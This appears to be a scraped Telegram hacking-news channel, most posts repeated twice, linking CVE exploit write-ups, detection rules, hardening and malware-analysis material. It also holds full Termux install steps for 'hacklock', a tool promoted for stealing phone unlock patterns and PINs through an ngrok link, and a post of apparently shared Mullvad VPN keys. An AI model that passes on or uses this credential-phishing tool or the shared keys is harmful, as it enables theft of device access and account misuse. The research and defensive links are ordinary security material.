#exploit
1. CVE-2022-37987:
A New Vector for Activation Context Cache Poisoning: Exploiting CSRSS for Privilege Escalation
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
2. A NETGEAR WAN Command Injection
https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection
3. Bypassing the Embedded Web Server's credential brute force prevention mechanism (PoC for CVE-2023-22960)
https://github.com/t3l3machus/CVE-2023-22960
// >60 Lexmark printer models
1. CVE-2022-37987:
A New Vector for Activation Context Cache Poisoning: Exploiting CSRSS for Privilege Escalation
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
2. A NETGEAR WAN Command Injection
https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection
3. Bypassing the Embedded Web Server's credential brute force prevention mechanism (PoC for CVE-2023-22960)
https://github.com/t3l3machus/CVE-2023-22960
// >60 Lexmark printer models
#OSINT
Detect Citrix Vulnerabilities With the OSINT Tool: CVE-2022-27510, CVE-2022-27518
https://blog.criminalip.io/2023/01/20/citrix-vulnerability
Detect Citrix Vulnerabilities With the OSINT Tool: CVE-2022-27510, CVE-2022-27518
https://blog.criminalip.io/2023/01/20/citrix-vulnerability
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰
Ⓜ️REQUIREMENTS :
Internet : 50 MB
php
Storage : 50 MB
ngrok Features :
[+] Real pattern hacking !
[+] Updated maintainence !
[+] Ngrok link
[+] Easy for Beginners !
INSTALLATION [Termux] :
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/hacklock
$ cd $HOME
$ ls
$ cd hacklock
$ ls
$ bash setup
$ bash hacklock.sh
[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...
[+]--You will recieve patter pin in below image you can see pattern with numbers
[+]--You can select any option by clicking on your keyboard
[+]--Note:- Don't delete any of the scripts included in core
〰〰〰〰〰〰〰〰〰〰〰〰〰
Ⓜ️REQUIREMENTS :
Internet : 50 MB
php
Storage : 50 MB
ngrok Features :
[+] Real pattern hacking !
[+] Updated maintainence !
[+] Ngrok link
[+] Easy for Beginners !
INSTALLATION [Termux] :
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/hacklock
$ cd $HOME
$ ls
$ cd hacklock
$ ls
$ bash setup
$ bash hacklock.sh
[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...
[+]--You will recieve patter pin in below image you can see pattern with numbers
[+]--You can select any option by clicking on your keyboard
[+]--Note:- Don't delete any of the scripts included in core
〰〰〰〰〰〰〰〰〰〰〰〰〰
👍1
Crips Tool is a collection of online IP Tools that can be used to quickly get information about IP Address's, Web Pages and DNS records.
Installation Commands
pkg update -y
pkg install git -y
pkg install python2 -y
git clone https://github.com/Manisso/Crips
cd Crips
python2 crips.py
Installation Commands
pkg update -y
pkg install git -y
pkg install python2 -y
git clone https://github.com/Manisso/Crips
cd Crips
python2 crips.py
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!
https://system32.ink/news-feed/p/181/
https://system32.ink/news-feed/p/181/
Mullvad VPN Key
All key valid for 14 days
Enjoy all 😂
7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 days
Enjoy all 😂
🍾3
Forwarded from ☠️Lèx Légîøn☠️
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
#GiveawayOnRepublicDay
TryHackMe 1 Month 3 Vouchers Giveaway...
If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe ID
We'll review your TryHackMe account and based on your progress we will try to ask some basic questions...
After that you will be given your TryHackMe Coupon...
Dm :- @lexlegion
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
#GiveawayOnRepublicDay
TryHackMe 1 Month 3 Vouchers Giveaway...
If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe ID
We'll review your TryHackMe account and based on your progress we will try to ask some basic questions...
After that you will be given your TryHackMe Coupon...
Dm :- @lexlegion
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
👍1
#Threat_Research
#Blue_Team_Techniques
1. At the Edge of Tier Zero: The Curious Case of the RODC
https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
2. Sigma Rule to Detect Uncommon Keyboard Layout Loads
https://gist.github.com/Neo23x0/62a75d4bbd26aa9164fa73384f6a1410
]-> Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
#Blue_Team_Techniques
1. At the Edge of Tier Zero: The Curious Case of the RODC
https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
2. Sigma Rule to Detect Uncommon Keyboard Layout Loads
https://gist.github.com/Neo23x0/62a75d4bbd26aa9164fa73384f6a1410
]-> Sysmon Config: https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
❤1
#Infographics
Linux Kernel Defence Map (v.5.13)
shows the relationships between vulnerability classes, exploitation techniques, bug detection mechanisms, and defence technologies
https://github.com/a13xp0p0v/linux-kernel-defence-map
Linux Kernel Defence Map (v.5.13)
shows the relationships between vulnerability classes, exploitation techniques, bug detection mechanisms, and defence technologies
https://github.com/a13xp0p0v/linux-kernel-defence-map
#exploit
1. CVE-2022-38181:
Vulnerability in the Arm Mali GPU
https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug
2. CVE-2023-0210:
Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow
1. CVE-2022-38181:
Vulnerability in the Arm Mali GPU
https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug
2. CVE-2023-0210:
Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
https://sysdig.com/blog/cve-2023-0210-linux-kernel-unauthenticated-remote-heap-overflow
#hardening
Digging into Linux namespaces
Part 1: https://blog.quarkslab.com/digging-into-linux-namespaces-part-1.html
Part 2: https://blog.quarkslab.com/digging-into-linux-namespaces-part-2.html
Digging into Linux namespaces
Part 1: https://blog.quarkslab.com/digging-into-linux-namespaces-part-1.html
Part 2: https://blog.quarkslab.com/digging-into-linux-namespaces-part-2.html
Cisco_Networks (3).pdf
35.3 MB
#Tech_book
"Cisco Networks:
Engineers’ Handbook of Routing, Switching, and Security with IOS, NX-OS, and ASA", 2021.
"Cisco Networks:
Engineers’ Handbook of Routing, Switching, and Security with IOS, NX-OS, and ASA", 2021.
👍2
LODEINFO.pdf
14.9 MB
#Malware_analysis
"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.
]-> LODEINFO Triage Tools:
https://github.com/nflabs/aa_tools/tree/main/lodeinfo
"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.
]-> LODEINFO Triage Tools:
https://github.com/nflabs/aa_tools/tree/main/lodeinfo
OpenCVe
OpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).
Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.
https://system32.ink/news-feed/p/182/
OpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).
Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.
https://system32.ink/news-feed/p/182/
Gank-RECON
Subdomains enumeration, various scans and testing of some vulnerabilities.
https://system32.ink/news-feed/p/183/
Subdomains enumeration, various scans and testing of some vulnerabilities.
https://system32.ink/news-feed/p/183/
Forwarded from 卩ro 爪Cracker
Whacking a phishing admin panel for fun and profit
https://ift.tt/RpX7QeP
Submitted January 26, 2023 at 10:32AM by thehunter699
via reddit https://ift.tt/Ia3shPl
https://ift.tt/RpX7QeP
Submitted January 26, 2023 at 10:32AM by thehunter699
via reddit https://ift.tt/Ia3shPl
Medium
Destroying the Scammers Portal — SBI Scam
Greetings to all readers,